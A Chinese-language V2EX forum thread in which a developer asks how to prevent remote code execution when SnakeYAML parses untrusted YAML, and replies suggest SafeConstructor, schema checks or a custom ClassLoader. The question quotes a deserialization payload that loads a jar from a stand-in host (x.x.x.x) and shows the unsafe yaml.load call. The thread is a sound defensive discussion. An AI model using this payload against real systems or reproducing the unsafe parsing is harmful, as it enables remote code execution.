Home Sign Up Sign In
sqfphoenix
V2EX  ›  Java

请教大家一下,如何避免 snakeyaml 解析 yaml 文件时被注入恶意代码导致远程执行呢

  •   
  •   sqfphoenix · Dec 15, 2020 · 2127 views
    This topic created in 2016 days ago, the information mentioned may be changed or developed.

    目前有这么一个需求,需要解析一个不确定格式的 yaml 文件为 json 。但是如果 yaml 是恶意的,如

    !!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://x.x.x.x/doSomething.jar"]
  ]]
]

    通过 snakeyaml 方法解析

    Yaml yaml = new Yaml(); //因为不能确定 yaml 具体格式,所以不能通过 Constructor 的方式避免漏洞
Object obj = yaml.load(yamlString);

    此时就会有远程执行的问题 请教大家这个问题如何解决呢,通过参数校验 yaml 内容也不太好解决,因为可能 yaml 会有其他变形

  • yaml
  • snakeyaml
  • 解析
  • 请教
    3 replies    2020-12-16 00:34:59 +08:00
    GM
        1
    GM  
       Dec 15, 2020
    schema 验证?
    dousha99
        2
    dousha99  
       Dec 15, 2020
    如果不能预知任何信息,只知道这会是一个用户输入,那么这个需求是完全不靠谱的...

    不过因为是解析为 JSON, 那么按道理应该是可以使用 `SafeConstructor` 来解析成 POJO.

    或者,自己写一个 ClassLoader 提供给 SnakeYaml, 拦截掉你认为危险的 Class 就可以了。
    miao1007
        3
    miao1007  
       Dec 16, 2020 via iPhone
    jenkins 有定制后的 yaml
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   5776 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 58ms · UTC 03:26 · PVG 11:26 · LAX 20:26 · JFK 23:26
    ♥ Do have faith in what you're doing.